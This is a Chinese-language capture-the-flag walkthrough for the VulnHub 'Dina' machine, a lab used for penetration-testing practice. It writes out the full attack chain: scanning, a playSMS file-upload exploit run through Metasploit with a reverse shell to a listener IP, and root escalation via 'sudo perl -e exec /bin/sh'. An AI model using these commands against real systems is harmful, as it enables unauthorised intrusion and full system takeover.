项目地址
https://download.vulnhub.com/dina/Dina-1-0-1.ova
更该靶机MAC地址
实验过程
开启靶机虚拟机
使用nmap进行主机发现,获取靶机IP地址
nmap 192.168.47.1-254
根据对比可知Dina的一个ip地址为192.168.47.166
扫描Dina的操作系统,端口及对应服务
nmap -A -p- 192.168.47.166
发现开放80端口
获取信息
访问网站
没有有用信息
目录扫描
dirb http://192.168.47.166
访问robots
尝试到拼接/nothing得到一个密码本
拼接/secure得到一个压缩文件
通过kali下载解压发现需要密码
结合刚才的密码本
解压出来一段音频
打开提示这似乎是个文本文件
使用文本打开它
拼接/SecreTSMSgatwayLogin
得到一个登录界面
通过密码本尝试可知密码为diana
获取shell
发现是playSMS框架 使用kali搜索一波
searchsploit playsms
将42044.txt 复制到/home/kali
cp /usr/share/exploitdb/exploits/php/webapps/42044.txt /home/kali
查看42044.txt文件
大概意思是可以生成一个csv文件,抓包传参;文档中给出了上传的脚本和信息,可以在user-agent中执行命令;并且那么我们就可以在playsms框架上寻找到可以upload(文件上传)的地址,上传CSV文件,利用burp抓包修改参数,从而getshell
使用msf查看框架漏洞
msfconsole
search playsms
使用漏洞2并show options
use 2
show options
配置
set PASSWORD diana
set USERNAME touhid
set TARGETURI SecreTSMSgatwayLogin (TARGETURI是上传文件页面的URI)
set RHOST 192.168.47.166(靶机ip)
set LHOST 192.168.47.129(kali监听机的ip)
set LPORT 2429(kali监听的端口)
run
不能执行命令,输入shell
提权
查看可提权文件
sudo -l
通过辅助网址查找perl | GTFOBins
sudo perl -e 'exec "/bin/sh";'
执行
提权成功